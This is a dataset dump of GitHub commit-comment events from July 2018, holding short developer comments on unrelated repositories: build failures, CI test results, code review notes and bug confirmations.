{"id":"7994851840","type":"CommitCommentEvent","actor":{"login":"Tafoid"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29778813,"position":null,"line":null,"path":null,"commit_id":"375427dcee1f354ea7b0171ac3a584bd7a85a2e2","created_at":"2018-07-20T12:56:03Z","updated_at":"2018-07-20T12:56:03Z","author_association":"CONTRIBUTOR","body":"I suspect possible regression noted with these 10 second snaps (from testing):\r\n\r\ncosmicos - cosmicos.cpp\r\n![cosmicos-diff](https://user-images.githubusercontent.com/9075896/43003421-72df0556-8bfa-11e8-9813-98cd1a334882.png)\r\n\r\nelf2 - elf.cpp\r\n![elf2-diff](https://user-images.githubusercontent.com/9075896/43003425-74948b82-8bfa-11e8-88ae-5249ada14377.png)\r\n"}},"created_at":"2018-07-20T12:56:03Z"}
{"id":"7994852139","type":"CommitCommentEvent","actor":{"login":"kuba97531"},"repo":{"name":"featurecat/lizzie"},"payload":{"comment":{"id":29778815,"position":44,"line":452,"path":"src/main/java/featurecat/lizzie/analysis/Leelaz.java","commit_id":"20611dbfdd3349204bfc14792544b62f95d97b26","created_at":"2018-07-20T12:56:08Z","updated_at":"2018-07-20T12:56:08Z","author_association":"NONE","body":"![43f5ddfdc4dcfa2702a850a66c4ce335](https://user-images.githubusercontent.com/133693/43003466-e48d8326-8c2c-11e8-99ad-72f433e7c32b.jpg)\r\nWould that be good?"}},"created_at":"2018-07-20T12:56:08Z"}
{"id":"7994852816","type":"CommitCommentEvent","actor":{"login":"Jahrenski"},"repo":{"name":"suitespot/cordova-plugin-file"},"payload":{"comment":{"id":29778819,"position":null,"line":null,"path":null,"commit_id":"2a0da7f1a43e88b801ee70a3462c3df829f4c927","created_at":"2018-07-20T12:56:16Z","updated_at":"2018-07-20T12:56:16Z","author_association":"NONE","body":"I confirm that I had the problem before and that this fix fixes it."}},"created_at":"2018-07-20T12:56:16Z"}
{"id":"7994853612","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778822,"position":null,"line":null,"path":null,"commit_id":"64ffc4fc004aa94b64d4a8f0d42ea10e63e2ca46","created_at":"2018-07-20T12:56:25Z","updated_at":"2018-07-20T12:56:25Z","author_association":"OWNER","body":"d"}},"created_at":"2018-07-20T12:56:25Z"}
{"id":"7994854910","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778827,"position":4,"line":16,"path":"src/CodingJava.java","commit_id":"64ffc4fc004aa94b64d4a8f0d42ea10e63e2ca46","created_at":"2018-07-20T12:56:41Z","updated_at":"2018-07-20T12:56:41Z","author_association":"OWNER","body":"f"}},"created_at":"2018-07-20T12:56:41Z"}
{"id":"7994855869","type":"CommitCommentEvent","actor":{"login":"c0b"},"repo":{"name":"c0b/docker-elixir"},"payload":{"comment":{"id":29778829,"position":null,"line":null,"path":null,"commit_id":"5849b7723cf7033532bcdcd14aa811f25f4a205e","created_at":"2018-07-20T12:56:53Z","updated_at":"2018-07-20T12:56:53Z","author_association":"OWNER","body":"yeah,  I am aware of that;  this revert was more from a Software Engineering consideration, because many ones have already been deploying solutions based on `elixir:1.6*` expecting newer patch versions upgrade only, not expecting big surprises by a major Erlang version upgrade;  so we can have better consistency for the already published `elixir:*` tags\r\n\r\nBTW, this commit is not the actual merged one, it was replaced by #74 and #73"}},"created_at":"2018-07-20T12:56:53Z"}
{"id":"7994863675","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29778847,"position":null,"line":null,"path":null,"commit_id":"7cfac46f38ab92e0c6030f7b4389d470de1f55c0","created_at":"2018-07-20T12:58:31Z","updated_at":"2018-07-20T12:58:31Z","author_association":"OWNER","body":"f"}},"created_at":"2018-07-20T12:58:31Z"}
{"id":"7994864466","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"ProjectInfinity/PocketVote-PocketMine"},"payload":{"comment":{"id":29778850,"position":null,"line":null,"path":null,"commit_id":"0b08e576a83dab8bb89213c4eca4cf9ed0fe60ff","created_at":"2018-07-20T12:58:40Z","updated_at":"2018-07-20T12:58:40Z","author_association":"NONE","body":"Dear @ProjectInfinity:\nI regret to inform you that the release you submitted, named \"**PocketVote**\" (v2.1.3), for the project [PocketVote-PocketMine](https://poggit.pmmp.io/ci/ProjectInfinity/PocketVote-PocketMine/PocketVote-PocketMine) on 2018-07-20T09:58:15.000Z, has been rejected.\n\nThis plugin declares unnecessary API versions. Only the lowest minor.patch required should be present. Please read [this](https://forums.pmmp.io/threads/choosing-supported-api-versions-in-a-plugin.6042/) to see how this should be done.\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-20T12:58:40Z"}
{"id":"7994868218","type":"CommitCommentEvent","actor":{"login":"gsmet"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":29778858,"position":21,"line":21,"path":"posts/Guillaume/2018-07-23-hibernate-orm-533-final-out.adoc","commit_id":"2dd4dcdecf4808ca53e1887c5d441d5f498919fc","created_at":"2018-07-20T12:59:26Z","updated_at":"2018-07-20T12:59:26Z","author_association":"MEMBER","body":"It means that we also fixed bugs affecting 5.2. So upgrading can fix issues you have with 5.2. Will try something clearer."}},"created_at":"2018-07-20T12:59:26Z"}
{"id":"7994868631","type":"CommitCommentEvent","actor":{"login":"Sirius207"},"repo":{"name":"ian29285716/X-Village-2018-Exercise"},"payload":{"comment":{"id":29778862,"position":null,"line":null,"path":null,"commit_id":"333ffe819c3b43d11592dd12eba2db74b1144484","created_at":"2018-07-20T12:59:31Z","updated_at":"2018-07-20T12:59:31Z","author_association":"NONE","body":"OK，都沒問題，這樣你就了解 try except的概念了\r\n"}},"created_at":"2018-07-20T12:59:31Z"}
{"id":"7994877972","type":"CommitCommentEvent","actor":{"login":"okyesful"},"repo":{"name":"githubs007/eternalwallet-progect"},"payload":{"comment":{"id":29778893,"position":null,"line":null,"path":null,"commit_id":"ddd1ec74d3eabef844c670f0a1441603346fcefb","created_at":"2018-07-20T13:01:25Z","updated_at":"2018-07-20T13:01:25Z","author_association":"NONE","body":"good exploer"}},"created_at":"2018-07-20T13:01:25Z"}
{"id":"7994880179","type":"CommitCommentEvent","actor":{"login":"MaximKitsenko"},"repo":{"name":"agileharbor/magentoAccess"},"payload":{"comment":{"id":29778896,"position":5,"line":171,"path":"src/MagentoAccess/Services/Rest/v2x/Repository/ProductRepository.cs","commit_id":"933423458dcf7c1b0b087a4bec166f4cb6851155","created_at":"2018-07-20T13:01:50Z","updated_at":"2018-07-20T13:01:50Z","author_association":"CONTRIBUTOR","body":"ok.\r\ni approved it"}},"created_at":"2018-07-20T13:01:50Z"}
{"id":"7994885906","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29778909,"position":null,"line":null,"path":null,"commit_id":"141a789e64dab714fe0a0d9615a82d7ed503f210","created_at":"2018-07-20T13:03:01Z","updated_at":"2018-07-20T13:03:01Z","author_association":"NONE","body":"compile fails "}},"created_at":"2018-07-20T13:03:01Z"}
{"id":"7994890568","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29778927,"position":null,"line":null,"path":null,"commit_id":"141a789e64dab714fe0a0d9615a82d7ed503f210","created_at":"2018-07-20T13:03:59Z","updated_at":"2018-07-20T13:03:59Z","author_association":"NONE","body":"just reverted it as\r\nninja: error: '/home/redking12/los/out/target/common/obj/JAVA_LIBRARIES/org.codeaurora.camera_intermediates/javalib.jar', needed by '/home/redking12/los/out/target/product/kuntao/dex_bootjars/system/framework/arm64/boot.art', missing and no known rule to make it\r\n12:54:56 ninja failed with: exit status 1"}},"created_at":"2018-07-20T13:03:59Z"}
{"id":"7994891867","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"matklad/rls"},"payload":{"comment":{"id":29778929,"position":2,"line":2,"path":".gitignore","commit_id":"ad9b801534391c052a92c6cfb3e4a63f3aa81701","created_at":"2018-07-20T13:04:15Z","updated_at":"2018-07-20T13:04:15Z","author_association":"OWNER","body":":rofl: :+1: "}},"created_at":"2018-07-20T13:04:15Z"}
{"id":"7994892205","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29778931,"position":null,"line":null,"path":null,"commit_id":"1a5a51c2d7fe1f9af610d85a8ec3a48b9953511b","created_at":"2018-07-20T13:04:19Z","updated_at":"2018-07-20T13:04:19Z","author_association":"COLLABORATOR","body":"Puzzle `129-385e3122` discovered in   [`front/js/shared/yandex.es6`](  https://github.com/fidals/shopelectro/blob/master/front/js/shared/yandex.es6)   and submitted as #434. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-20T13:04:19Z"}
{"id":"7994894270","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29778933,"position":null,"line":null,"path":null,"commit_id":"141a789e64dab714fe0a0d9615a82d7ed503f210","created_at":"2018-07-20T13:04:44Z","updated_at":"2018-07-20T13:04:44Z","author_association":"NONE","body":"just reverted it as\r\nninja: error: '/home/redking12/los/out/target/common/obj/JAVA_LIBRARIES/org.codeaurora.camera_intermediates/javalib.jar', needed by '/home/redking12/los/out/target/product/kuntao/dex_bootjars/system/framework/arm64/boot.art', missing and no known rule to make it\r\n12:54:56 ninja failed with: exit status 1\r\nand it compiles now"}},"created_at":"2018-07-20T13:04:44Z"}
{"id":"7994900648","type":"CommitCommentEvent","actor":{"login":"Narcolapser"},"repo":{"name":"O365/python-o365"},"payload":{"comment":{"id":29778949,"position":null,"line":null,"path":null,"commit_id":"9ef36981167a428de8474891e818f4f4fb7e42cd","created_at":"2018-07-20T13:05:57Z","updated_at":"2018-07-20T13:05:57Z","author_association":"COLLABORATOR","body":"@HeadJar please open a issue for such questions rather than clutter existing pull requests."}},"created_at":"2018-07-20T13:05:57Z"}
{"id":"7994903395","type":"CommitCommentEvent","actor":{"login":"Narcolapser"},"repo":{"name":"O365/python-o365"},"payload":{"comment":{"id":29778955,"position":30,"line":120,"path":"O365/fluent_message.py","commit_id":"9ef36981167a428de8474891e818f4f4fb7e42cd","created_at":"2018-07-20T13:06:32Z","updated_at":"2018-07-20T13:06:32Z","author_association":"COLLABORATOR","body":"Good catch. Could you submit a pull request correcting that? Thanks. "}},"created_at":"2018-07-20T13:06:32Z"}
{"id":"7994906164","type":"CommitCommentEvent","actor":{"login":"Sirius207"},"repo":{"name":"ian29285716/X-Village-2018-Exercise"},"payload":{"comment":{"id":29778963,"position":null,"line":null,"path":null,"commit_id":"25df6b8df2dff917de1e1e27729c0a4159f42da8","created_at":"2018-07-20T13:07:06Z","updated_at":"2018-07-20T13:07:06Z","author_association":"NONE","body":"喔，會用enumerate ，沒關係都可以了"}},"created_at":"2018-07-20T13:07:06Z"}
{"id":"7994917787","type":"CommitCommentEvent","actor":{"login":"pglevy"},"repo":{"name":"pglevy/bixal-sketch-template"},"payload":{"comment":{"id":29778991,"position":null,"line":null,"path":null,"commit_id":"e78fc247d6b8f4c56af6456e7e7471e2ea64d55b","created_at":"2018-07-20T13:09:28Z","updated_at":"2018-07-20T13:09:28Z","author_association":"OWNER","body":"Closes #1 "}},"created_at":"2018-07-20T13:09:28Z"}
{"id":"7994918431","type":"CommitCommentEvent","actor":{"login":"kseo"},"repo":{"name":"CodeChain-io/codechain-sdk-js"},"payload":{"comment":{"id":29778993,"position":36,"line":55,"path":"examples/mint-and-transfer.js","commit_id":"1d43c5249bbc848e94c648d57246412595f84c3a","created_at":"2018-07-20T13:09:36Z","updated_at":"2018-07-20T13:09:36Z","author_association":"CONTRIBUTOR","body":"It would be nice if addOutput can receive an array of objects."}},"created_at":"2018-07-20T13:09:36Z"}
{"id":"7994920555","type":"CommitCommentEvent","actor":{"login":"chandratop"},"repo":{"name":"chandratop/TestGithub"},"payload":{"comment":{"id":29778997,"position":null,"line":null,"path":null,"commit_id":"809995131d05e7604b182c2260a06ff7a85d8879","created_at":"2018-07-20T13:10:02Z","updated_at":"2018-07-20T13:10:02Z","author_association":"OWNER","body":"first comment"}},"created_at":"2018-07-20T13:10:02Z"}
{"id":"7994921096","type":"CommitCommentEvent","actor":{"login":"ErikvdBurgwal"},"repo":{"name":"ErikvdBurgwal/MyExcel"},"payload":{"comment":{"id":29779000,"position":null,"line":null,"path":null,"commit_id":"ee16b074d871e676dfe78c32cb0288fe3a3bfc03","created_at":"2018-07-20T13:10:09Z","updated_at":"2018-07-20T13:10:09Z","author_association":"OWNER","body":"(something went wrong here)"}},"created_at":"2018-07-20T13:10:09Z"}
{"id":"7994923596","type":"CommitCommentEvent","actor":{"login":"basecode"},"repo":{"name":"electron-userland/electron-builder"},"payload":{"comment":{"id":29779005,"position":16,"line":41,"path":"packages/app-builder-lib/src/index.ts","commit_id":"c35b3150536be66a9e1c2aae75f7e8f7f610699d","created_at":"2018-07-20T13:10:40Z","updated_at":"2018-07-20T13:10:40Z","author_association":"NONE","body":"From what I see this change is checking the wrong options.\r\n\r\n`Object.keys(options)` returns the releaseTypes `[ 'draft', 'prerelease', 'targets' ]` in my case. Since I don't specify a releaseType it picks the default \"draft\" and returns `Unknown option \"draft\"`.\r\n\r\nmy setup:\r\n\r\n```js\r\n\"build\": {\r\n    \"asar\": true,\r\n    \"appId\": \"...\",\r\n    \"win\": {\r\n      \"target\": [\r\n        {\r\n          \"target\": \"nsis\",\r\n          \"arch\": [\r\n            \"x64\",\r\n            \"ia32\"\r\n          ]\r\n        }\r\n      ],\r\n      \"icon\": \"icons/win/icon.ico\"\r\n    }\r\n  },\r\n```\r\n\r\n```\r\n$ electron-builder --windows nsis\r\n```\r\n"}},"created_at":"2018-07-20T13:10:40Z"}
{"id":"7994931229","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29779031,"position":null,"line":null,"path":null,"commit_id":"3d55305d32b7b79e4d2adcef586960c1b72ceeb2","created_at":"2018-07-20T13:12:16Z","updated_at":"2018-07-20T13:12:16Z","author_association":"NONE","body":"@noobpwnftw  Sorry, I cant approve [this](http://tests.stockfishchess.org/tests/view/5b51ddf00ebc5902bdb7ea77) because [-3,1] bounds here are not appropriate IMO.\r\nYou remove || th->rootMoves[0].score >= VALUE_MATE_IN_MAX_PLY \r\nbut AFAIK this was introduced recently as a bugfix.\r\nBut it's actually the new (scoreDiff == 0 && depthDiff > 0) condition which makes the thing more complex as before and therefore requires [0,5] bounds.\r\n"}},"created_at":"2018-07-20T13:12:16Z"}
{"id":"7994935060","type":"CommitCommentEvent","actor":{"login":"srikanthb551"},"repo":{"name":"srikanthb551/new-project"},"payload":{"comment":{"id":29779039,"position":null,"line":null,"path":null,"commit_id":"e292bfaf312ee1bd6ec25117e44c80e1fdc7b6bd","created_at":"2018-07-20T13:13:04Z","updated_at":"2018-07-20T13:13:04Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-20T13:13:04Z"}
{"id":"7994937285","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29779046,"position":10,"line":14,"path":"re_triangle.rb","commit_id":"9493533adc72858cb5c921e570968b43831593bf","created_at":"2018-07-20T13:13:30Z","updated_at":"2018-07-20T13:13:30Z","author_association":"NONE","body":"Почти то, что нужно, но тут есть одна проблема. Порядок условий имеет значение. На данный момент интепретатор заходит в этот блок и смотри удовлетворяется ли первое условие. Он проверят ``` if rectangular```, что является правдой и выполняет код внутри. И идет дальше. Таким образом мы никогда не зайдем во второе условие где треугольник и прямоугольный и равнобедренный;"}},"created_at":"2018-07-20T13:13:30Z"}
{"id":"7994938300","type":"CommitCommentEvent","actor":{"login":"jow-"},"repo":{"name":"f00b4r0/owtbuildbot"},"payload":{"comment":{"id":29779047,"position":null,"line":null,"path":null,"commit_id":"8db316b4608443afced6d5362be06f3ba95e3950","created_at":"2018-07-20T13:13:42Z","updated_at":"2018-07-20T13:13:42Z","author_association":"CONTRIBUTOR","body":"Removal of `-4` will cause problems. Some builders have spotty IPv6 connectivity or slow(er) IPv6 connectivity due to tunneling."}},"created_at":"2018-07-20T13:13:42Z"}
{"id":"7994939210","type":"CommitCommentEvent","actor":{"login":"develar"},"repo":{"name":"electron-userland/electron-builder"},"payload":{"comment":{"id":29779048,"position":16,"line":41,"path":"packages/app-builder-lib/src/index.ts","commit_id":"c35b3150536be66a9e1c2aae75f7e8f7f610699d","created_at":"2018-07-20T13:13:53Z","updated_at":"2018-07-20T13:13:53Z","author_association":"MEMBER","body":"@basecode Should be fixed in 20.24.2"}},"created_at":"2018-07-20T13:13:53Z"}
{"id":"7994945370","type":"CommitCommentEvent","actor":{"login":"jow-"},"repo":{"name":"f00b4r0/owtbuildbot"},"payload":{"comment":{"id":29779066,"position":49,"line":675,"path":"phase1/master.cfg","commit_id":"6de3075549e8550224b286b996ee7efd978c9328","created_at":"2018-07-20T13:15:08Z","updated_at":"2018-07-20T13:15:08Z","author_association":"CONTRIBUTOR","body":"It probably makes sense to `exec` into the target command"}},"created_at":"2018-07-20T13:15:08Z"}
{"id":"7994946072","type":"CommitCommentEvent","actor":{"login":"cleiton1992"},"repo":{"name":"cleiton1992/MyCurses"},"payload":{"comment":{"id":29779070,"position":4,"line":12,"path":"AluraJava/src/saccz.java","commit_id":"8c2cc80f37b64656ed747f720493ec49d21474dd","created_at":"2018-07-20T13:15:16Z","updated_at":"2018-07-20T13:15:16Z","author_association":"OWNER","body":"olha isso direito"}},"created_at":"2018-07-20T13:15:16Z"}
{"id":"7994948219","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29779076,"position":null,"line":null,"path":null,"commit_id":"e17266cba39a9a4fe68cfcb5ff574472db47fd3e","created_at":"2018-07-20T13:15:41Z","updated_at":"2018-07-20T13:15:41Z","author_association":"NONE","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e17266cba39a9a4fe68cfcb5ff574472db47fd3e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2018-07-20T13:15:41Z"}
{"id":"7994955334","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29779089,"position":null,"line":null,"path":null,"commit_id":"fd35c50222db475d83f56714ab20034bbf5002ba","created_at":"2018-07-20T13:17:04Z","updated_at":"2018-07-20T13:17:04Z","author_association":"NONE","body":"@noobpwnftw Sorry, [this ](http://tests.stockfishchess.org/tests/view/5b51df6d0ebc5902bdb7ea79 ) IMO can only be accepted with [-3,1] bounds as a bugfix. If it's so, OK, then you have to explain the bug, otherwise is has to run with [0,4] bounds proving it as an improvement in playing strength ;-)"}},"created_at":"2018-07-20T13:17:04Z"}
{"id":"7994966330","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29779114,"position":null,"line":null,"path":null,"commit_id":"97c91fe51ba364b6491963676074b5b3d846e32b","created_at":"2018-07-20T13:19:11Z","updated_at":"2018-07-20T13:19:11Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-20T13:19:11Z"}
{"id":"7994968265","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29779121,"position":null,"line":null,"path":null,"commit_id":"da831f606fea22bc93966a6fa6e81ad59f68024e","created_at":"2018-07-20T13:19:33Z","updated_at":"2018-07-20T13:19:33Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-20T13:19:33Z"}
{"id":"7994970354","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29779126,"position":null,"line":null,"path":null,"commit_id":"2c7dbec22611e10ba20238947a3d74d7352cea4c","created_at":"2018-07-20T13:19:59Z","updated_at":"2018-07-20T13:19:59Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-20T13:19:59Z"}
{"id":"7994970842","type":"CommitCommentEvent","actor":{"login":"eduard-vasinskyi"},"repo":{"name":"softindex/datakernel"},"payload":{"comment":{"id":29779127,"position":null,"line":null,"path":null,"commit_id":"5e562abbdfa43a30102886aab7b976f36db98d9c","created_at":"2018-07-20T13:20:05Z","updated_at":"2018-07-20T13:20:05Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [SerializerGenEnum - as varInt](https://trello.com/c/Tz50e5bf/178-serializergenenum-as-varint)"}},"created_at":"2018-07-20T13:20:05Z"}
{"id":"7994972587","type":"CommitCommentEvent","actor":{"login":"basecode"},"repo":{"name":"electron-userland/electron-builder"},"payload":{"comment":{"id":29779130,"position":16,"line":41,"path":"packages/app-builder-lib/src/index.ts","commit_id":"c35b3150536be66a9e1c2aae75f7e8f7f610699d","created_at":"2018-07-20T13:20:25Z","updated_at":"2018-07-20T13:20:25Z","author_association":"NONE","body":"@develar I can confirm it's working. Thanks. Any chance to see a automated test here? "}},"created_at":"2018-07-20T13:20:25Z"}
{"id":"7994975454","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29779138,"position":null,"line":null,"path":null,"commit_id":"e17266cba39a9a4fe68cfcb5ff574472db47fd3e","created_at":"2018-07-20T13:20:57Z","updated_at":"2018-07-20T13:20:57Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e17266cba39a9a4fe68cfcb5ff574472db47fd3e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-20T13:20:57Z"}
{"id":"7994980930","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29779147,"position":null,"line":null,"path":null,"commit_id":"3d55305d32b7b79e4d2adcef586960c1b72ceeb2","created_at":"2018-07-20T13:22:00Z","updated_at":"2018-07-20T13:22:00Z","author_association":"OWNER","body":"The condition >= VALUE_MATE_IN_MAX_PLY holds true if one thread has a mate score, and it is always picked if it's the best.\r\nThe second condition is a tie-breaker so that it prefers the thread with higher depth.\r\n\r\nOld logic seems problematic:\r\n1. scoreDiff > 0 - highest score gets picked, fine.\r\n2. depthDiff >= 0 - only pick higher depth when score is higher, sort of make sense, but better threads can failed high.\r\n3. || > MATE - if #2 isn't there, why do you need it if it is already covered by #1?\r\n\r\nSo it should be no worse than a non-regression, but I doubt it can be significant enough to pass a [0,5].\r\nMight be fun to try."}},"created_at":"2018-07-20T13:22:00Z"}
{"id":"7994982069","type":"CommitCommentEvent","actor":{"login":"KurtSchlegel"},"repo":{"name":"TakosThings/Metro-for-Discord"},"payload":{"comment":{"id":29779152,"position":null,"line":null,"path":null,"commit_id":"efd354365615aebb6a21a716bb943a04d1f0ea86","created_at":"2018-07-20T13:22:14Z","updated_at":"2018-07-20T13:22:14Z","author_association":"NONE","body":"Is there any way to disable the \"chat bubble\" look? not a big fan of it tbh"}},"created_at":"2018-07-20T13:22:14Z"}
{"id":"7994984273","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29779159,"position":null,"line":null,"path":null,"commit_id":"e17266cba39a9a4fe68cfcb5ff574472db47fd3e","created_at":"2018-07-20T13:22:41Z","updated_at":"2018-07-20T13:22:41Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (mjwitte) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2943 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e17266cba39a9a4fe68cfcb5ff574472db47fd3e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e17266cba39a9a4fe68cfcb5ff574472db47fd3e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.06%25-red.png)</a> \n"}},"created_at":"2018-07-20T13:22:41Z"}
{"id":"7994987199","type":"CommitCommentEvent","actor":{"login":"hackermd"},"repo":{"name":"dcmjs-org/dicomweb-client"},"payload":{"comment":{"id":29779164,"position":null,"line":null,"path":null,"commit_id":"3f6492a7da5d42121c173f8522d9cf3045765f61","created_at":"2018-07-20T13:23:16Z","updated_at":"2018-07-20T13:23:16Z","author_association":"MEMBER","body":"Looks good to me.\r\n\r\nDo we also want to check for validity of query parameters?\r\nhttp://dicom.nema.org/medical/dicom/current/output/chtml/part18/sect_6.7.html"}},"created_at":"2018-07-20T13:23:16Z"}
{"id":"7995019255","type":"CommitCommentEvent","actor":{"login":"eduard-vasinskyi"},"repo":{"name":"softindex/datakernel"},"payload":{"comment":{"id":29779232,"position":null,"line":null,"path":null,"commit_id":"a2ebce2ed05661968b85da6b8cab666f652954ff","created_at":"2018-07-20T13:29:30Z","updated_at":"2018-07-20T13:29:30Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [SerializerGenEnum - as varInt](https://trello.com/c/Tz50e5bf/178-serializergenenum-as-varint)"}},"created_at":"2018-07-20T13:29:30Z"}
{"id":"7995020121","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29779235,"position":6,"line":48,"path":"Lesson_3/station_control.rb","commit_id":"a9d08664353d2eadf1a4f8ea6479a6eba122eb23","created_at":"2018-07-20T13:29:41Z","updated_at":"2018-07-20T13:29:41Z","author_association":"NONE","body":"current_station_index больше похоже на вещь, которая используется только внутри класса. Не думаю, что ее следует открывать миру"}},"created_at":"2018-07-20T13:29:41Z"}
{"id":"7995021594","type":"CommitCommentEvent","actor":{"login":"387652336"},"repo":{"name":"KevinZhaoZL/SpringMVCYlrc"},"payload":{"comment":{"id":29779242,"position":null,"line":null,"path":null,"commit_id":"f35f0538d87d0bedac6d68d44e1ba210e3eb1177","created_at":"2018-07-20T13:29:58Z","updated_at":"2018-07-20T13:29:58Z","author_association":"NONE","body":"数据库能共享一下吗？"}},"created_at":"2018-07-20T13:29:58Z"}
{"id":"7995024752","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29779252,"position":null,"line":null,"path":null,"commit_id":"fd35c50222db475d83f56714ab20034bbf5002ba","created_at":"2018-07-20T13:30:31Z","updated_at":"2018-07-20T13:30:31Z","author_association":"NONE","body":"OK, if is passes we will see what maintainers will say...\r\nGL and have a nice weekend. :-)"}},"created_at":"2018-07-20T13:30:31Z"}
{"id":"7995027378","type":"CommitCommentEvent","actor":{"login":"Sirius207"},"repo":{"name":"yuchun0524/X-Village-2018-Exercise"},"payload":{"comment":{"id":29779257,"position":null,"line":null,"path":null,"commit_id":"d956e6e7c542d2bf3632b7b69c3b51e9f9b57e77","created_at":"2018-07-20T13:31:01Z","updated_at":"2018-07-20T13:31:01Z","author_association":"NONE","body":"ok~\r\n這樣寫是可以跑的，不過也可以不用在 def 裡面又寫一個 try except，\r\n你可以參考這一份\r\nhttps://github.com/b54041106/X-village-2018-exercise/blob/master/Lesson4_exception_Jul16/ex4.py"}},"created_at":"2018-07-20T13:31:01Z"}
{"id":"7995028295","type":"CommitCommentEvent","actor":{"login":"hackermd"},"repo":{"name":"dcmjs-org/dicomweb-client"},"payload":{"comment":{"id":29779262,"position":null,"line":null,"path":null,"commit_id":"3f6492a7da5d42121c173f8522d9cf3045765f61","created_at":"2018-07-20T13:31:11Z","updated_at":"2018-07-20T13:31:11Z","author_association":"MEMBER","body":"I noticed that `retrieveStudyMetadata` method has `queryParams`, which we should remove."}},"created_at":"2018-07-20T13:31:11Z"}
